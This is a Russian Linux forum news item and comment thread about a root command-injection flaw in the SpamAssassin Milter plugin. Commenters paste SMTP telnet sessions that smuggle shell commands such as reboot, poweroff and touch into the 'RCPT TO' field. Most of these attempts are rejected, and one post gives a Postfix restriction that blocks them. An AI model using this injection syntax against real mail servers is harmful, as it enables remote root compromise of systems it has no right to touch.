LINUX.ORG.RU

Критическая уязвимость в SpamAssassin Milter Plugin


0

0

Уязвимость позволяет выпонить любой код на сервере с root. Для этого достаточно отравить письмо в поле «rcpt to» находится строка «root+:|команда»). Например - «root+:poweroff». Проблема касается абсолютно всех MTA поддерживающих milter.

>>> Подробности



Проверено: hibou ()
Ответ на: комментарий от shaplov

>Это не уязвимость... Это Бэкдор...

Правильнее сказать «недокументированная возможность».

anonymous
()
Ответ на: комментарий от Be-LucK

> Всё равно не пользуюсь.

А какой у вас маил?)))

shaplov> Это не уязвимость... Это Бэкдор...

Однозначно бэкдор, интересно адреса, явки разработчиков известны.

Alesh
()

по сравнению с IE просто фигня

bernd ★★★★★
()
Ответ на: комментарий от Alesh

вас его использовать никто не заставлял. вы получили его как есть со всеми вытекающими. вот купите поддержку платную, тогда и выкабенивайтесь перед публикой, а так грызите бублик и не булькайте.

bernd ★★★★★
()

Например - «root+:poweroff».

О, спасибо, сделал на двух серверах:

root+:/usr/bin/apt-get update
root+:/usr/bin/apt-get upgrade

И уязвимость пропала.

Igron ★★★★★
()

Х--ссе..

anonymous
()
Ответ на: комментарий от bernd

> вас его использовать никто не заставлял. вы получили его как есть со всеми вытекающими. вот купите поддержку платную, тогда и выкабенивайтесь перед публикой, а так грызите бублик и не булькайте.

Грызи бублик сам, я вообще не одмин и никокой маилсервер не юзаю.

И вообще мы тут шутим с БеЛуком, а ты вщемился в дискас. Какую-то поддержку платную предлагаешь купить. Тут тебе не рынок )))

Alesh
()
Ответ на: комментарий от JB

При чем тут МТА? какой-нибудь сендмыл сто лет уже как дропает рутовские привелегии при старте.

Sun-ch
() автор топика
Ответ на: комментарий от thesis

«Некоторые администраторы уже отметили наличие попыток эксплуатации данной уязвимости в логах, все ждут появление червя».

Sun-ch
() автор топика

Не работает

504 5.5.2 <root+:poweroff>: Recipient address rejected: need fully-qualified address

Как и было сказано выше - на нормально настроенном сервере работать не будет

anonymous
()

вот это да. включу зелёную консоль и буду гордиться собой.

RedPossum ★★★★★
()
Ответ на: комментарий от Sun-ch

> При чем тут МТА? какой-нибудь сендмыл сто лет уже как дропает рутовские привелегии при старте.

при том, что письмо с кривым «rcpt to» вообще не должно попадать в очередь

Mar 19 19:12:28 razvitie63 postfix/smtpd[24730]: NOQUEUE: reject: RCPT from localhost.localdomain[127.0.0.1]: 550 5.1.1 <root+:|touch /tmp/test123>: Recipient address rejected: User unknown in virtual mailbox table; from=<artem@localhost> to=<root+:|touch /tmp/test123> proto=ESMTP helo=<razvitie63.ru>

JB ★★★★★
()
Ответ на: комментарий от Sun-ch

Ни чего не изменилось

rctp to:root+:|poweroff 502 5.5.2 Error: command not recognized rcpt to:«root+:|poweroff» 504 5.5.2 <root+:|poweroff>: Recipient address rejected: need fully-qualified address

Тебе стоило обратить внимание на сообщение от сервера.

anonymous
()

>Например - «root+:poweroff». Когда же вы выучите немецкий? Halt, ублюдки, halt.

anonymous
()

Неужто spamd под рутом работает?

sdio ★★★★★
()

artemz@artemz-laptop:~$ telnet ***.ru 25 Trying *******... Connected to ******. Escape character is '^]'. 220 *********** ESMTP Sendmail 8.13.8/8.13.8; Fri, 19 Mar 2010 16:53:17 +0100 helo ddd.ru 250 server.wind-host.ru Hello, pleased to meet you mail from: mail@rambler.ru 250 2.1.0 mail@rambler.ru... Sender ok RCPT TO:<root+:|reboot> 250 2.1.5 <root+:|reboot>... Recipient ok DATA 354 Enter mail, end with "." on a line by itself sdasdasd . 250 2.0.0 o2JFrHlu008660 Message accepted for delivery

Connection closed by foreign host.

ОЛОЛОЛО!111

ArtemZ
()
Ответ на: комментарий от Sun-ch

[(19:52):artem@razvitie63:~ ] telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 razvitie63.ru ESMTP Postfix (Debian/GNU)
mail from: artem@localhost
250 2.1.0 Ok
rcpt to: root+:«|touch /tmp/foobar123»
550 5.1.1 <root+:|touch /tmp/foobar123>: Recipient address rejected: User unknown in virtual mailbox table

[(19:53):artem@razvitie63:~ ] ls /tmp/foobar123
ls: невозможно получить доступ к /tmp/foobar123: Нет такого файла или каталога

и?

JB ★★★★★
()

[fjfalcon@desktop ~]$ telnet * 25
Trying 8.8.8.8...
Connected to google.com.
Escape character is '^]'.
220 google.com ESMTP Postfix (Debian/GNU)
MAIL FROM: fjfalcon@fjfalcon.ru
250 2.1.0 Ok
RCPT TO:<root+:|reboot>
450 4.2.0 <root+:|reboot>: Recipient address rejected: Greylisted, see http://postgrey.schweikert.ch/help/root+:|reboot.html


это нормально?

fjfalcon ★★★
()

[root@layer hikaru]# telnet 192.168.1.250 25
Trying 192.168.1.250...
Connected to 192.168.1.250.
Escape character is '^]'.
220 ****.ru ESMTP Postfix (Debian/GNU)
Helo mail.example.com
250 ****.ru
mail from: abc@abc.ru
250 2.1.0 Ok
rcpt to: root+:«|touch /tmp/foo»
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address

Неужто так трудно правильно настроить сервак?

Hikaru
()

обычное дело для перловой программы чуть крупнее hello-world - обилие отладочных вставок, т.к. читать большинство перлового кода после второй страницы уже невозможно. так что это не бэкдор, а обычные пеловые костыли, случайно забытые строителями.

Momyc
()
Ответ на: комментарий от fjfalcon

[fjfalcon@desktop ~]$ telnet google.com 25
Trying 8.8.8.8...
Connected to google.com.
Escape character is '^]'.
220 google.com ESMTP Postfix (Debian/GNU)
mail from: me@me.ru
250 2.1.0 Ok
rcpt-to: root+:«|touch /tmp/foo»
221 2.7.0 Error: I can break rules, too. Goodbye.
Connection closed by foreign host.


после apt-get upgrade ;)

fjfalcon ★★★
()

В свете вышеизложенного вопрос. как скоро ляжет ЛОР ? Отправьте им уже «письмо счастья»

abumbaher
()

Блестяще. Я замер в восторге, ручки зачесались. Напомнило мне сендмыловское WIZ. Школота конечно не помнит...

anonymous
()
Ответ на: комментарий от Momyc

Ололо. Еще один эксперт не писавший на преле программ сложнее указанного hello world.

anonymous
()

ох блин.. ну и решето..

isden ★★★★★
()

У меня нигде не сработало :(

BSD
()

лол
решение

 smtpd_recipient_restriction =
...
        reject_non_fqdn_recipient,
        reject_unknown_recipient_domain,
        reject_unverified_recipient,
...

кидайте симпы :3

guyvernk
()
Ответ на: комментарий от fjfalcon

Да уж, мне стоит быть внимательнее-) Хотя настроение ты мне поднял.

Hikaru
()
Ответ на: комментарий от guyvernk

А я то думаю чего у меня нифига не получается...

Storm_
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.